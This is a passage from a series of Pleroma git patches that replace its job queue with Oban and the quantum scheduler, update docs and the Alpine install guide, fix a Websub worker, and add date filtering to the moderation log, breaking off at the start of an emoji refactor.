diff --git a/test/support/oban_helpers.ex b/test/support/oban_helpers.ex
index d379c9ec7..989770926 100644
--- a/test/support/oban_helpers.ex
+++ b/test/support/oban_helpers.ex
@@ -16,7 +16,7 @@ def perform_all do
end
def perform(%Oban.Job{} = job) do
- res = apply(String.to_existing_atom("Elixir." <> job.worker), :perform, [job])
+ res = apply(String.to_existing_atom("Elixir." <> job.worker), :perform, [job.args, job])
Repo.delete(job)
res
end
From c056736daaedb2a08557ee6c6a9bcb6bf44110ca Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Fri, 23 Aug 2019 16:11:39 +0300
Subject: [PATCH 007/272] [#1149] Publisher worker fix (atomized `params`
keys).
---
lib/pleroma/workers/publisher.ex | 1 +
1 file changed, 1 insertion(+)
diff --git a/lib/pleroma/workers/publisher.ex b/lib/pleroma/workers/publisher.ex
index 0a9084589..00fae99c7 100644
--- a/lib/pleroma/workers/publisher.ex
+++ b/lib/pleroma/workers/publisher.ex
@@ -18,6 +18,7 @@ def perform(%{"op" => "publish", "activity_id" => activity_id}, _job) do
end
def perform(%{"op" => "publish_one", "module" => module_name, "params" => params}, _job) do
+ params = Map.new(params, fn {k, v} -> {String.to_atom(k), v} end)
Federator.perform(:publish_one, String.to_atom(module_name), params)
end
end
From 581123f8bb703023cb652267a1fc34292f862852 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Fri, 23 Aug 2019 18:28:23 +0300
Subject: [PATCH 008/272] [#1149] Introduced `quantum` job scheduler.
Documentation & config changes.
---
CHANGELOG.md | 2 ++
config/config.exs | 40 +++++++++++++++++---------
config/test.exs | 2 --
docs/config.md | 15 ++++++----
lib/pleroma/application.ex | 19 ++----------
lib/pleroma/scheduler.ex | 7 +++++
lib/pleroma/web/federator/federator.ex | 8 +-----
mix.exs | 2 +-
mix.lock | 6 +++-
9 files changed, 54 insertions(+), 47 deletions(-)
create mode 100644 lib/pleroma/scheduler.ex
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 7b0f4f40e..6dc19e79f 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -19,6 +19,8 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Mastodon API: Unsubscribe followers when they unfollow a user
- AdminAPI: Add "godmode" while fetching user statuses (i.e. admin can see private statuses)
- Improve digest email template
+- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) with [Oban](https://github.com/sorentwo/oban)
+- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
### Fixed
- Not being able to pin unlisted posts
diff --git a/config/config.exs b/config/config.exs
index 1a6348bcd..43d114d70 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -51,6 +51,24 @@
telemetry_event: [Pleroma.Repo.Instrumenter],
migration_lock: nil
+scheduled_jobs =
+ with digest_config <- Application.get_env(:pleroma, :email_notifications)[:digest],
+ true <- digest_config[:active] do
+ [{digest_config[:schedule], {Pleroma.DigestEmailWorker, :perform, []}}]
+ else
+ _ -> []
+ end
+
+scheduled_jobs =
+ scheduled_jobs ++
+ [{"0 */6 * * * *", {Pleroma.Web.Websub, :refresh_subscriptions, []}}]
+
+config :pleroma, Pleroma.Scheduler,
+ global: true,
+ overlap: true,
+ timezone: :utc,
+ jobs: scheduled_jobs
+
config :pleroma, Pleroma.Captcha,
enabled: false,
seconds_valid: 60,
@@ -449,23 +467,19 @@
"web"
]
-job_queues = [
- federator_incoming: 50,
- federator_outgoing: 50,
- web_push: 50,
- mailer: 10,
- transmogrifier: 20,
- scheduled_activities: 10,
- background: 5
-]
-
-config :pleroma_job_queue, :queues, job_queues
-
config :pleroma, Oban,
repo: Pleroma.Repo,
verbose: false,
prune: {:maxage, 60 * 60 * 24 * 7},
- queues: job_queues
+ queues: [
+ federator_incoming: 50,
+ federator_outgoing: 50,
+ web_push: 50,
+ mailer: 10,
+ transmogrifier: 20,
+ scheduled_activities: 10,
+ background: 5
+ ]
config :pleroma, :workers,
retries: [
diff --git a/config/test.exs b/config/test.exs
index a0fa67516..62f2a04d2 100644
--- a/config/test.exs
+++ b/config/test.exs
@@ -61,8 +61,6 @@
config :web_push_encryption, :http_client, Pleroma.Web.WebPushHttpClientMock
-config :pleroma_job_queue, disabled: true
-
config :pleroma, Oban,
queues: false,
prune: :disabled
diff --git a/docs/config.md b/docs/config.md
index ae8afad89..81923c640 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -400,9 +400,9 @@ You can then do
curl "http://localhost:4000/api/pleroma/admin/invite_token?admin_token=somerandomtoken"
```
-## :pleroma_job_queue
+## Oban
-[Pleroma Job Queue](https://git.pleroma.social/pleroma/pleroma_job_queue) configuration: a list of queues with maximum concurrent jobs.
+[Oban](https://github.com/sorentwo/oban) asynchronous job processor configuration.
Pleroma has the following queues:
@@ -416,12 +416,15 @@ Pleroma has the following queues:
Example:
```elixir
-config :pleroma_job_queue, :queues,
- federator_incoming: 50,
- federator_outgoing: 50
+config :pleroma, Oban,
+ repo: Pleroma.Repo,
+ queues: [
+ federator_incoming: 50,
+ federator_outgoing: 50
+ ]
```
-This config contains two queues: `federator_incoming` and `federator_outgoing`. Both have the `max_jobs` set to `50`.
+This config contains two queues: `federator_incoming` and `federator_outgoing`. Both have the number of max concurrent jobs set to `50`.
## Pleroma.Web.Metadata
* `providers`: a list of metadata providers to enable. Providers available:
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 384b03aa9..ce2d3ab59 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -31,6 +31,7 @@ def start(_type, _args) do
children =
[
Pleroma.Repo,
+ Pleroma.Scheduler,
Pleroma.Config.TransferTask,
Pleroma.Emoji,
Pleroma.Captcha,
@@ -69,9 +70,7 @@ def start(_type, _args) do
# See http://elixir-lang.org/docs/stable/elixir/Supervisor.html
# for other strategies and supported options
opts = [strategy: :one_for_one, name: Pleroma.Supervisor]
- result = Supervisor.start_link(children, opts)
- :ok = after_supervisor_start()
- result
+ Supervisor.start_link(children, opts)
end
defp setup_instrumenters do
@@ -162,18 +161,4 @@ defp hackney_pool_children do
:hackney_pool.child_spec(pool, options)
end
end
-
- defp after_supervisor_start do
- with digest_config <- Application.get_env(:pleroma, :email_notifications)[:digest],
- true <- digest_config[:active] do
- # TODO: consider replacing with `quantum` scheduler
- PleromaJobQueue.schedule(
- digest_config[:schedule],
- :digest_emails,
- Pleroma.DigestEmailWorker
- )
- end
-
- :ok
- end
end
diff --git a/lib/pleroma/scheduler.ex b/lib/pleroma/scheduler.ex
new file mode 100644
index 000000000..d84cd99ad
--- /dev/null
+++ b/lib/pleroma/scheduler.ex
@@ -0,0 +1,7 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Scheduler do
+ use Quantum.Scheduler, otp_app: :pleroma
+end
diff --git a/lib/pleroma/web/federator/federator.ex b/lib/pleroma/web/federator/federator.ex
index d85fe824f..cf7e50fee 100644
--- a/lib/pleroma/web/federator/federator.ex
+++ b/lib/pleroma/web/federator/federator.ex
@@ -21,7 +21,7 @@ defmodule Pleroma.Web.Federator do
defdelegate worker_args(queue), to: Pleroma.Workers.Helper
def init do
- # 1 minute
+ # To do: consider removing this call in favor of scheduled execution (`quantum`-based)
refresh_subscriptions(schedule_in: 60)
end
@@ -146,12 +146,6 @@ def perform(:verify_websub, websub) do
def perform(:refresh_subscriptions) do
Logger.debug("Federator running refresh subscriptions")
Websub.refresh_subscriptions()
-
- spawn(fn ->
- # 6 hours
- Process.sleep(1000 * 60 * 60 * 6)
- refresh_subscriptions()
- end)
end
def ap_enabled_actor(id) do
diff --git a/mix.exs b/mix.exs
index eb023313d..9d8ded1ff 100644
--- a/mix.exs
+++ b/mix.exs
@@ -102,6 +102,7 @@ defp deps do
{:ecto_sql, "~> 3.1"},
{:postgrex, ">= 0.13.5"},
{:oban, "~> 0.7"},
+ {:quantum, "~> 2.3"},
{:gettext, "~> 0.15"},
{:comeonin, "~> 4.1.1"},
{:pbkdf2_elixir, "~> 0.12.3"},
@@ -142,7 +143,6 @@ defp deps do
{:http_signatures,
git: "https://git.pleroma.social/pleroma/http_signatures.git",
ref: "293d77bb6f4a67ac8bde1428735c3b42f22cbb30"},
- {:pleroma_job_queue, "~> 0.3"},
{:telemetry, "~> 0.3"},
{:prometheus_ex, "~> 3.0"},
{:prometheus_plugs, "~> 1.1"},
diff --git a/mix.lock b/mix.lock
index 8b8596375..6ebc66271 100644
--- a/mix.lock
+++ b/mix.lock
@@ -36,6 +36,8 @@
"excoveralls": {:hex, :excoveralls, "0.11.1", "dd677fbdd49114fdbdbf445540ec735808250d56b011077798316505064edb2c", [:mix], [{:hackney, "~> 1.0", [hex: :hackney, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: false]}], "hexpm"},
"floki": {:hex, :floki, "0.20.4", "be42ac911fece24b4c72f3b5846774b6e61b83fe685c2fc9d62093277fb3bc86", [:mix], [{:html_entities, "~> 0.4.0", [hex: :html_entities, repo: "hexpm", optional: false]}, {:mochiweb, "~> 2.15", [hex: :mochiweb, repo: "hexpm", optional: false]}], "hexpm"},
"gen_smtp": {:hex, :gen_smtp, "0.14.0", "39846a03522456077c6429b4badfd1d55e5e7d0fdfb65e935b7c5e38549d9202", [:rebar3], [], "hexpm"},
+ "gen_stage": {:hex, :gen_stage, "0.14.2", "6a2a578a510c5bfca8a45e6b27552f613b41cf584b58210f017088d3d17d0b14", [:mix], [], "hexpm"},
+ "gen_state_machine": {:hex, :gen_state_machine, "2.0.5", "9ac15ec6e66acac994cc442dcc2c6f9796cf380ec4b08267223014be1c728a95", [:mix], [], "hexpm"},
"gettext": {:hex, :gettext, "0.17.0", "abe21542c831887a2b16f4c94556db9c421ab301aee417b7c4fbde7fbdbe01ec", [:mix], [], "hexpm"},
"hackney": {:hex, :hackney, "1.15.1", "9f8f471c844b8ce395f7b6d8398139e26ddca9ebc171a8b91342ee15a19963f4", [:rebar3], [{:certifi, "2.5.1", [hex: :certifi, repo: "hexpm", optional: false]}, {:idna, "6.0.0", [hex: :idna, repo: "hexpm", optional: false]}, {:metrics, "1.0.1", [hex: :metrics, repo: "hexpm", optional: false]}, {:mimerl, "~>1.1", [hex: :mimerl, repo: "hexpm", optional: false]}, {:ssl_verify_fun, "1.1.4", [hex: :ssl_verify_fun, repo: "hexpm", optional: false]}], "hexpm"},
"html_entities": {:hex, :html_entities, "0.4.0", "f2fee876858cf6aaa9db608820a3209e45a087c5177332799592142b50e89a6b", [:mix], [], "hexpm"},
@@ -46,6 +48,7 @@
"jason": {:hex, :jason, "1.1.2", "b03dedea67a99223a2eaf9f1264ce37154564de899fd3d8b9a21b1a6fd64afe7", [:mix], [{:decimal, "~> 1.0", [hex: :decimal, repo: "hexpm", optional: true]}], "hexpm"},
"joken": {:hex, :joken, "2.0.1", "ec9ab31bf660f343380da033b3316855197c8d4c6ef597fa3fcb451b326beb14", [:mix], [{:jose, "~> 1.9", [hex: :jose, repo: "hexpm", optional: false]}], "hexpm"},
"jose": {:hex, :jose, "1.9.0", "4167c5f6d06ffaebffd15cdb8da61a108445ef5e85ab8f5a7ad926fdf3ada154", [:mix, :rebar3], [{:base64url, "~> 0.0.1", [hex: :base64url, repo: "hexpm", optional: false]}], "hexpm"},
+ "libring": {:hex, :libring, "1.4.0", "41246ba2f3fbc76b3971f6bce83119dfec1eee17e977a48d8a9cfaaf58c2a8d6", [:mix], [], "hexpm"},
"makeup": {:hex, :makeup, "0.8.0", "9cf32aea71c7fe0a4b2e9246c2c4978f9070257e5c9ce6d4a28ec450a839b55f", [:mix], [{:nimble_parsec, "~> 0.5.0", [hex: :nimble_parsec, repo: "hexpm", optional: false]}], "hexpm"},
"makeup_elixir": {:hex, :makeup_elixir, "0.13.0", "be7a477997dcac2e48a9d695ec730b2d22418292675c75aa2d34ba0909dcdeda", [:mix], [{:makeup, "~> 0.8", [hex: :makeup, repo: "hexpm", optional: false]}], "hexpm"},
"meck": {:hex, :meck, "0.8.13", "ffedb39f99b0b99703b8601c6f17c7f76313ee12de6b646e671e3188401f7866", [:rebar3], [], "hexpm"},
@@ -65,7 +68,6 @@
"phoenix_html": {:hex, :phoenix_html, "2.13.1", "fa8f034b5328e2dfa0e4131b5569379003f34bc1fafdaa84985b0b9d2f12e68b", [:mix], [{:plug, "~> 1.5", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"phoenix_pubsub": {:hex, :phoenix_pubsub, "1.1.2", "496c303bdf1b2e98a9d26e89af5bba3ab487ba3a3735f74bf1f4064d2a845a3e", [:mix], [], "hexpm"},
"phoenix_swoosh": {:hex, :phoenix_swoosh, "0.2.0", "a7e0b32077cd6d2323ae15198839b05d9caddfa20663fd85787479e81f89520e", [:mix], [{:phoenix, "~> 1.0", [hex: :phoenix, repo: "hexpm", optional: false]}, {:phoenix_html, "~> 2.2", [hex: :phoenix_html, repo: "hexpm", optional: false]}, {:swoosh, "~> 0.1", [hex: :swoosh, repo: "hexpm", optional: false]}], "hexpm"},
- "pleroma_job_queue": {:hex, :pleroma_job_queue, "0.3.0", "b84538d621f0c3d6fcc1cff9d5648d3faaf873b8b21b94e6503428a07a48ec47", [:mix], [{:crontab, "~> 1.1", [hex: :crontab, repo: "hexpm", optional: false]}], "hexpm"},
"plug": {:hex, :plug, "1.8.2", "0bcce1daa420f189a6491f3940cc77ea7fb1919761175c9c3b59800d897440fc", [:mix], [{:mime, "~> 1.0", [hex: :mime, repo: "hexpm", optional: false]}, {:plug_crypto, "~> 1.0", [hex: :plug_crypto, repo: "hexpm", optional: false]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: true]}], "hexpm"},
"plug_cowboy": {:hex, :plug_cowboy, "2.1.0", "b75768153c3a8a9e8039d4b25bb9b14efbc58e9c4a6e6a270abff1cd30cbe320", [:mix], [{:cowboy, "~> 2.5", [hex: :cowboy, repo: "hexpm", optional: false]}, {:plug, "~> 1.7", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"plug_crypto": {:hex, :plug_crypto, "1.0.0", "18e49317d3fa343f24620ed22795ec29d4a5e602d52d1513ccea0b07d8ea7d4d", [:mix], [], "hexpm"},
@@ -78,9 +80,11 @@
"prometheus_phoenix": {:hex, :prometheus_phoenix, "1.3.0", "c4b527e0b3a9ef1af26bdcfbfad3998f37795b9185d475ca610fe4388fdd3bb5", [:mix], [{:phoenix, "~> 1.4", [hex: :phoenix, repo: "hexpm", optional: false]}, {:prometheus_ex, "~> 1.3 or ~> 2.0 or ~> 3.0", [hex: :prometheus_ex, repo: "hexpm", optional: false]}], "hexpm"},
"prometheus_plugs": {:hex, :prometheus_plugs, "1.1.5", "25933d48f8af3a5941dd7b621c889749894d8a1082a6ff7c67cc99dec26377c5", [:mix], [{:accept, "~> 0.1", [hex: :accept, repo: "hexpm", optional: false]}, {:plug, "~> 1.0", [hex: :plug, repo: "hexpm", optional: false]}, {:prometheus_ex, "~> 1.1 or ~> 2.0 or ~> 3.0", [hex: :prometheus_ex, repo: "hexpm", optional: false]}, {:prometheus_process_collector, "~> 1.1", [hex: :prometheus_process_collector, repo: "hexpm", optional: true]}], "hexpm"},
"quack": {:hex, :quack, "0.1.1", "cca7b4da1a233757fdb44b3334fce80c94785b3ad5a602053b7a002b5a8967bf", [:mix], [{:poison, ">= 1.0.0", [hex: :poison, repo: "hexpm", optional: false]}, {:tesla, "~> 1.2.0", [hex: :tesla, repo: "hexpm", optional: false]}], "hexpm"},
+ "quantum": {:hex, :quantum, "2.3.4", "72a0e8855e2adc101459eac8454787cb74ab4169de6ca50f670e72142d4960e9", [:mix], [{:calendar, "~> 0.17", [hex: :calendar, repo: "hexpm", optional: true]}, {:crontab, "~> 1.1", [hex: :crontab, repo: "hexpm", optional: false]}, {:gen_stage, "~> 0.12", [hex: :gen_stage, repo: "hexpm", optional: false]}, {:swarm, "~> 3.3", [hex: :swarm, repo: "hexpm", optional: false]}, {:timex, "~> 3.1", [hex: :timex, repo: "hexpm", optional: true]}], "hexpm"},
"ranch": {:hex, :ranch, "1.7.1", "6b1fab51b49196860b733a49c07604465a47bdb78aa10c1c16a3d199f7f8c881", [:rebar3], [], "hexpm"},
"recon": {:git, "https://github.com/ferd/recon.git", "75d70c7c08926d2f24f1ee6de14ee50fe8a52763", [tag: "2.4.0"]},
"ssl_verify_fun": {:hex, :ssl_verify_fun, "1.1.4", "f0eafff810d2041e93f915ef59899c923f4568f4585904d010387ed74988e77b", [:make, :mix, :rebar3], [], "hexpm"},
+ "swarm": {:hex, :swarm, "3.4.0", "64f8b30055d74640d2186c66354b33b999438692a91be275bb89cdc7e401f448", [:mix], [{:gen_state_machine, "~> 2.0", [hex: :gen_state_machine, repo: "hexpm", optional: false]}, {:libring, "~> 1.0", [hex: :libring, repo: "hexpm", optional: false]}], "hexpm"},
"sweet_xml": {:hex, :sweet_xml, "0.6.6", "fc3e91ec5dd7c787b6195757fbcf0abc670cee1e4172687b45183032221b66b8", [:mix], [], "hexpm"},
"swoosh": {:hex, :swoosh, "0.23.2", "7dda95ff0bf54a2298328d6899c74dae1223777b43563ccebebb4b5d2b61df38", [:mix], [{:cowboy, "~> 1.0.1 or ~> 1.1 or ~> 2.4", [hex: :cowboy, repo: "hexpm", optional: true]}, {:gen_smtp, "~> 0.13", [hex: :gen_smtp, repo: "hexpm", optional: true]}, {:hackney, "~> 1.9", [hex: :hackney, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: false]}, {:mail, "~> 0.2", [hex: :mail, repo: "hexpm", optional: true]}, {:mime, "~> 1.1", [hex: :mime, repo: "hexpm", optional: false]}, {:plug_cowboy, ">= 1.0.0", [hex: :plug_cowboy, repo: "hexpm", optional: true]}], "hexpm"},
"syslog": {:git, "https://github.com/Vagabond/erlang-syslog.git", "4a6c6f2c996483e86c1320e9553f91d337bcb6aa", [tag: "1.0.5"]},
From 71700ea6d4104ecd2cc0afb0ac103e722b30fbb5 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Sat, 24 Aug 2019 09:27:32 +0300
Subject: [PATCH 009/272] [#1149] Updated docs & tests.
---
docs/config.md | 6 ++++++
test/web/admin_api/admin_api_controller_test.exs | 4 ++--
2 files changed, 8 insertions(+), 2 deletions(-)
diff --git a/docs/config.md b/docs/config.md
index 81923c640..5b2c3a022 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -426,6 +426,12 @@ config :pleroma, Oban,
This config contains two queues: `federator_incoming` and `federator_outgoing`. Both have the number of max concurrent jobs set to `50`.
+## :workers
+
+Includes custom worker options not interpretable directly by `Oban`.
+
+* `retries` — keyword lists where keys are `Oban` queues (see above) and values are numbers of max attempts for failed jobs.
+
## Pleroma.Web.Metadata
* `providers`: a list of metadata providers to enable. Providers available:
* Pleroma.Web.Metadata.Providers.OpenGraph
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index 844cd0732..a867ac998 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -1861,7 +1861,7 @@ test "queues key as atom", %{conn: conn} do
post(conn, "/api/pleroma/admin/config", %{
configs: [
%{
- "group" => "pleroma_job_queue",
+ "group" => "oban",
"key" => ":queues",
"value" => [
%{"tuple" => [":federator_incoming", 50]},
@@ -1879,7 +1879,7 @@ test "queues key as atom", %{conn: conn} do
assert json_response(conn, 200) == %{
"configs" => [
%{
- "group" => "pleroma_job_queue",
+ "group" => "oban",
"key" => ":queues",
"value" => [
%{"tuple" => [":federator_incoming", 50]},
From ef9930ed8050a309f2d95df8f0504de2b1da4677 Mon Sep 17 00:00:00 2001
From: ultem
Date: Sat, 24 Aug 2019 10:16:27 +0000
Subject: [PATCH 010/272] Minor corrections and clarification for Alpine
standard v.3.10
---
docs/installation/alpine_linux_en.md | 33 +++++++++++++++++++++++-----
1 file changed, 28 insertions(+), 5 deletions(-)
diff --git a/docs/installation/alpine_linux_en.md b/docs/installation/alpine_linux_en.md
index 1f300f353..c77618936 100644
--- a/docs/installation/alpine_linux_en.md
+++ b/docs/installation/alpine_linux_en.md
@@ -1,7 +1,9 @@
# Installing on Alpine Linux
## Installation
-This guide is a step-by-step installation guide for Alpine Linux. It also assumes that you have administrative rights, either as root or a user with [sudo permissions](https://www.linode.com/docs/tools-reference/custom-kernels-distros/install-alpine-linux-on-your-linode/#configuration). If you want to run this guide with root, ignore the `sudo` at the beginning of the lines, unless it calls a user like `sudo -Hu pleroma`; in this case, use `su -l -s $SHELL -c 'command'` instead.
+This guide is a step-by-step installation guide for Alpine Linux. The instructions were verified against Alpine v.3.10 standard image. You might miss additional dependencies if you use `netboot` instead.
+
+It assumes that you have administrative rights, either as root or a user with [sudo permissions](https://www.linode.com/docs/tools-reference/custom-kernels-distros/install-alpine-linux-on-your-linode/#configuration). If you want to run this guide with root, ignore the `sudo` at the beginning of the lines, unless it calls a user like `sudo -Hu pleroma`; in this case, use `su -l -s $SHELL -c 'command'` instead.
### Required packages
@@ -20,12 +22,13 @@ This guide is a step-by-step installation guide for Alpine Linux. It also assume
### Prepare the system
-* First make sure to have the community repository enabled:
+* The community repository must be enabled in `/etc/apk/repositories`. Depending on which version and mirror you use this looks like `http://alpine.42.fr/v3.10/community`. If you autogenerated the mirror during installation:
```shell
-echo "https://nl.alpinelinux.org/alpine/latest-stable/community" | sudo tee -a /etc/apk/repository
+awk 'NR==2' /etc/apk/repositories | sed 's/main/community/' | tee -a /etc/apk/repositories
```
+
* Then update the system, if not already done:
```shell
@@ -77,7 +80,8 @@ sudo rc-update add postgresql
* Add a new system user for the Pleroma service:
```shell
-sudo adduser -S -s /bin/false -h /opt/pleroma -H pleroma
+sudo addgroup pleroma
+sudo adduser -S -s /bin/false -h /opt/pleroma -H -G pleroma pleroma
```
**Note**: To execute a single command as the Pleroma system user, use `sudo -Hu pleroma command`. You can also switch to a shell by using `sudo -Hu pleroma $SHELL`. If you don’t have and want `sudo` on your system, you can use `su` as root user (UID 0) for a single command by using `su -l pleroma -s $SHELL -c 'command'` and `su -l pleroma -s $SHELL` for starting a shell.
@@ -164,7 +168,26 @@ If that doesn’t work, make sure, that nginx is not already running. If it stil
sudo cp /opt/pleroma/installation/pleroma.nginx /etc/nginx/conf.d/pleroma.conf
```
-* Before starting nginx edit the configuration and change it to your needs (e.g. change servername, change cert paths)
+* Before starting nginx edit the configuration and change it to your needs. You must change change `server_name` and the paths to the certificates. You can use `nano` (install with `apk add nano` if missing).
+
+```
+server {
+ server_name your.domain;
+ listen 80;
+ ...
+}
+
+server {
+ server_name your.domain;
+ listen 443 ssl http2;
+ ...
+ ssl_trusted_certificate /etc/letsencrypt/live/your.domain/chain.pem;
+ ssl_certificate /etc/letsencrypt/live/your.domain/fullchain.pem;
+ ssl_certificate_key /etc/letsencrypt/live/your.domain/privkey.pem;
+ ...
+}
+```
+
* Enable and start nginx:
```shell
From cd78e63a2528ab813088d5e44a026f6bb05b344b Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Tue, 27 Aug 2019 14:34:37 +0300
Subject: [PATCH 011/272] [#1149] Bugfix: Pleroma.Workers.Subscriber /
"verify_websub" works with WebsubServerSubscription.
---
lib/pleroma/workers/subscriber.ex | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/pleroma/workers/subscriber.ex b/lib/pleroma/workers/subscriber.ex
index 783c44173..e960b35bf 100644
--- a/lib/pleroma/workers/subscriber.ex
+++ b/lib/pleroma/workers/subscriber.ex
@@ -5,7 +5,7 @@
defmodule Pleroma.Workers.Subscriber do
alias Pleroma.Repo
alias Pleroma.Web.Federator
- alias Pleroma.Web.Websub.WebsubClientSubscription
+ alias Pleroma.Web.Websub
# Note: `max_attempts` is intended to be overridden in `new/1` call
use Oban.Worker,
@@ -18,12 +18,12 @@ def perform(%{"op" => "refresh_subscriptions"}, _job) do
end
def perform(%{"op" => "request_subscription", "websub_id" => websub_id}, _job) do
- websub = Repo.get(WebsubClientSubscription, websub_id)
+ websub = Repo.get(Websub.WebsubClientSubscription, websub_id)
Federator.perform(:request_subscription, websub)
end
def perform(%{"op" => "verify_websub", "websub_id" => websub_id}, _job) do
- websub = Repo.get(WebsubClientSubscription, websub_id)
+ websub = Repo.get(Websub.WebsubServerSubscription, websub_id)
Federator.perform(:verify_websub, websub)
end
end
From 5e4fde1d3d49ec56fae3b199fb4af51057e2dffd Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Tue, 27 Aug 2019 20:48:16 +0300
Subject: [PATCH 012/272] Filter logs by date
---
lib/pleroma/moderation_log.ex | 37 ++++++++++++++-
lib/pleroma/user/info.ex | 4 +-
.../web/admin_api/admin_api_controller.ex | 8 +++-
.../admin_api/admin_api_controller_test.exs | 46 +++++++++++++++++++
4 files changed, 89 insertions(+), 6 deletions(-)
diff --git a/lib/pleroma/moderation_log.ex b/lib/pleroma/moderation_log.ex
index 1ef6fe67a..2164ecfc2 100644
--- a/lib/pleroma/moderation_log.ex
+++ b/lib/pleroma/moderation_log.ex
@@ -14,13 +14,46 @@ defmodule Pleroma.ModerationLog do
timestamps()
end
- def get_all(page, page_size) do
+ def get_all(params) do
+ params
+ |> get_all_query()
+ |> maybe_filter_by_date(params)
+ |> Repo.all()
+ end
+
+ defp maybe_filter_by_date(query, %{start_date: nil, end_date: nil}), do: query
+
+ defp maybe_filter_by_date(query, %{start_date: start_date, end_date: nil}) do
+ from(q in query,
+ where: q.inserted_at >= ^parse_datetime(start_date)
+ )
+ end
+
+ defp maybe_filter_by_date(query, %{start_date: nil, end_date: end_date}) do
+ from(q in query,
+ where: q.inserted_at <= ^parse_datetime(end_date)
+ )
+ end
+
+ defp maybe_filter_by_date(query, %{start_date: start_date, end_date: end_date}) do
+ from(q in query,
+ where: q.inserted_at >= ^parse_datetime(start_date),
+ where: q.inserted_at <= ^parse_datetime(end_date)
+ )
+ end
+
+ defp get_all_query(%{page: page, page_size: page_size}) do
from(q in __MODULE__,
order_by: [desc: q.inserted_at],
limit: ^page_size,
offset: ^((page - 1) * page_size)
)
- |> Repo.all()
+ end
+
+ defp parse_datetime(datetime) do
+ {:ok, parsed_datetime, _} = DateTime.from_iso8601(datetime)
+
+ parsed_datetime
end
def insert_log(%{
diff --git a/lib/pleroma/user/info.ex b/lib/pleroma/user/info.ex
index 779bfbc18..7027c947b 100644
--- a/lib/pleroma/user/info.ex
+++ b/lib/pleroma/user/info.ex
@@ -318,9 +318,7 @@ defp valid_field?(%{"name" => name, "value" => value}) do
name_limit = Pleroma.Config.get([:instance, :account_field_name_length], 255)
value_limit = Pleroma.Config.get([:instance, :account_field_value_length], 255)
- is_binary(name) &&
- is_binary(value) &&
- String.length(name) <= name_limit &&
+ is_binary(name) && is_binary(value) && String.length(name) <= name_limit &&
String.length(value) <= value_limit
end
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 544b9d7d8..065394a24 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -539,7 +539,13 @@ def status_delete(%{assigns: %{user: user}} = conn, %{"id" => id}) do
def list_log(conn, params) do
{page, page_size} = page_params(params)
- log = ModerationLog.get_all(page, page_size)
+ log =
+ ModerationLog.get_all(%{
+ page: page,
+ page_size: page_size,
+ start_date: params["start_date"],
+ end_date: params["end_date"]
+ })
conn
|> put_view(ModerationLogView)
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index 4e2c27431..a7269aee9 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -2348,6 +2348,52 @@ test "returns the log with pagination", %{conn: conn, admin: admin} do
assert second_entry["message"] ==
"@#{admin.nickname} followed relay: https://example.org/relay"
end
+
+ test "filters log by date", %{conn: conn, admin: admin} do
+ first_date = "2017-08-15T15:47:06Z"
+ second_date = "2017-08-20T15:47:06Z"
+
+ Repo.insert(%ModerationLog{
+ data: %{
+ actor: %{
+ "id" => admin.id,
+ "nickname" => admin.nickname,
+ "type" => "user"
+ },
+ action: "relay_follow",
+ target: "https://example.org/relay"
+ },
+ inserted_at: NaiveDateTime.from_iso8601!(first_date)
+ })
+
+ Repo.insert(%ModerationLog{
+ data: %{
+ actor: %{
+ "id" => admin.id,
+ "nickname" => admin.nickname,
+ "type" => "user"
+ },
+ action: "relay_unfollow",
+ target: "https://example.org/relay"
+ },
+ inserted_at: NaiveDateTime.from_iso8601!(second_date)
+ })
+
+ conn1 =
+ get(
+ conn,
+ "/api/pleroma/admin/moderation_log?start_date=#{second_date}"
+ )
+
+ response1 = json_response(conn1, 200)
+ [first_entry] = response1
+
+ assert response1 |> length() == 1
+ assert first_entry["data"]["action"] == "relay_unfollow"
+
+ assert first_entry["message"] ==
+ "@#{admin.nickname} unfollowed relay: https://example.org/relay"
+ end
end
end
From cef2e980b1f6b07c2bdb01030559aca83257bd7e Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Wed, 28 Aug 2019 21:32:44 +0300
Subject: [PATCH 013/272] division emoji.ex on loader.ex and emoji.ex
---
lib/mix/tasks/pleroma/emoji.ex | 2 +-
lib/pleroma/emoji.ex | 212 +++------------------------------
lib/pleroma/emoji/loader.ex | 204 +++++++++++++++++++++++++++++++
test/emoji/loader_test.exs | 83 +++++++++++++
test/emoji_test.exs | 75 ------------
